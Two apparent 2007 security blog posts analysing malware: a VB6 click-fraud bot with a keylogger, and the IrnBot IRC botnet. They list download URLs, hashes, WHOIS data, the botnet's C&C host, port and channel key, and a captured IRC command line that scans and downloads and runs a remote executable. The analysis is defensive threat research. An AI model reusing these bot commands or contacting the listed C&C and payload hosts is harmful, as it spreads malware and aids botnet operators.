Thursday, March 29, 2007

ClickBot/Affiliate Bot

With the help of UploadMalware.com and Atribune.org, we have uncovered what appears to be a clickthru/affiliatebot with a possible keylogger and password stealer.

A user noticed some odd behavior on his PC and decided to run several anti-malware programs and post his findings on the popular Atribune forums.
The Atribune moderator was able to notice an oddly named file, notedad.exe, a spoof on notepad.exe - a valid windows text editor.
It was coded in VB6 and it installs a keylogger while downloading a secondary trojan from carordriver.com. This second trojan is also coded in VB6.

The file, named 070323.exe, makes connections to

http://www.carordriver.com/070323/cpccpmqian.asp and http://www.carordriver.com/070323/cpccpm.asp. 

The first line of each webpage is decoded,

<p><a href=\"http://<rk>http:// www.beaniechild.com/<rg><cik> 1<cig> \">1</a></p>
is parsed to read (spaces added)
http:// www.beaniechild.com /


Every couple of minutes the carordriver pages are pulled again and another affiliate/click thru is accomplished. By visiting the pages over and over again and viewing the source code, you can see the extent of this clickware.
The keylogger data is stored in a .dbt file located in
%system32%\IExplorer.dll .dbt

The malware itself doesn't make any changes to the browser. It makes no attempts to hijack the home or search pages and does not open popup windows. It appears to only open the sites in an attempt to make money. Of course sometimes affiliate links turn out to be binaries. This bot will happily download and run the binary code. For example, one of the affiliate links forced a download of:

http://installs .spamblockerutility .com /installs/spamblockerutility/programs/spamblockerutility.exe (spaces added for click protection) which is infected with Trojan.Hotbar.A

netstat -ao shows several dozen websites open by the bot. The md5 hash of 070323.exe is 59c80110f8952fd3f4fafe7c503d051f.

Domain name: carordriver.com

Administrative Contact:
Gold-Domain, Inc.
Whois Protector (support@gold-domain.com)
+1.2132740657
Fax:
PMB 368, 14150 NE 20th St - F1
Bellevue, WA 98007
US

carordriver.com has address 124.133.18.151
route: 124.128.0.0/13
descr: CNC Group CHINA169 Shandong Province Network
country: CN
origin: AS4837
mnt-by: MAINT-CNCGROUP-RR
changed: abuse@cnc-noc.net 20060306
source: APNIC

role: CNCGroup Hostmaster
e-mail: abuse@cnc-noc.net
address: No.156,Fu-Xing-Men-Nei Street,
address: Beijing,100031,P.R.China
nic-hdl: CH455-AP
phone: +86-10-82993155
fax-no: +86-10-82993102
country: CN

AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name
4837 | 124.133.18.151 | 124.128.0.0/13 | CN | apnic | 2006-02-24 | CHINA169-BACKBONE CNCGROUP China169 Backbone

Labels: , ,

Wednesday, March 07, 2007

IrnBot enjoys the attention from Offensive Computing.

OffensiveComputing is a community of anti-malware experts from all parts of the world.

They posted a blog entry about a the recent RinBot, aka Irnbot, aka VanBot.

When looking at the disassembly, the author appears to want his bot called 'IrnBot'......

The author seems to enjoy the attention his bot is attracting. 'Im-a-drone'...err, Irnbot has made references to Symantec, CNN, and now our friends over at Offensive Computing. Each time he's mentioned he uses the new found fame on the next bot code update. Last time I saw something this entertaining is back when Witlog was running.

http://58.xx.xxx.39/asm.exe (66a92827c333cb1d43762f33535a6d61)

IRC Based C&C at: x.anti-viral.us:8080

x.anti-viral.us has address 164.58.226.10
x.anti-viral.us has address 218.27.101.46
x.anti-viral.us has address 150.208.128.13
x.anti-viral.us has address 82.193.223.230
x.anti-viral.us has address 138.80.9.178
x.anti-viral.us has address 85.185.251.131
x.anti-viral.us has address 207.47.230.31
x.anti-viral.us has address 69.181.7.244
x.anti-viral.us has address 211.43.206.127

Uses nickname format: [XP|USA|P|00|jibberish]
User connect String: XP-USA 0 0 :[XP|USA|P|00|jibberish]

Channel: ##OC
Key: hellovalsmit

:s013.xnet.net 332 [XP|USA|P|00|] ##OC :.scan.stop
-s;.scan.start N 30 -s;.scan.start N 30 -a -s;.scan.start N x.x.x.x 30
-s;.scan.start M 15 -a -s;.scan.start M 15 -s;.scan.start M x.x.x.x 15
-s;.scan.start S 15 -a -s;.scan.start S 15 -s;.scan.start S x.x.x.x 15
-s;.download Off3ns1v3C0mputingD0wnload http://210.xx.xx.118/MS.exe
c:\m.exe -e -s


The MS.exe file is his 'spammer' application, which connects to http://66.xxx.xxx.9/x/getConfig.php to launch a spam run.

His current spam topic is: Analysis: Verdict puts focus on Cheney

Note the channel key: hellovalsmit or Hello Val Smith, Val Smith is the CTO of Offensive Computing.

This guy appears to own or control these domains:

x.anti-viral.us
is.wayne.brady.gonna.have.to.chokeabitch.us
x.rofflewaffles.us
mx.sbn01.to
ircd.myadv.biz